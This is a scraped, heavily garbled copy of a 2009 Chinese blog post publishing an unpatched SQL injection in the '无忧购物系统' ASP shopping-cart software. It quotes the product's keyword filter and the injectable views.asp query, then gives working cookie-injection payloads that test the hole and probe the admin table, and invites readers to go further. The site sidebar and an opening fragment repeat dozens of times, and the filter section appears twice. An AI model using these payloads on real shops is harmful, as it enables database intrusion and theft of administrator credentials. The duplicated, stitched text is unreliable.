Chinaunix首页 | 论坛 | 博客
  • 博客访问: 3029827
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029828
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029829
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029830
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029831
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029832
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029833
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029824
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029835
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029836
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029837
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029838
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029839
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029840
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029841
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029842
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029843
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029844
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029845
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029846
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029847
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029848
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029839
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029850
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029851
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029852
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029853
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029854
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029855
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029856
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029857
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029858
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029859
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029860
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029861
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029862
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029863
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029854
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029865
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029866
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029867
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029868
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029869
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029870
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029871
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029872
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029873
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029874
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029875
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029876
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029877
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3029878
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%>

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43103) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
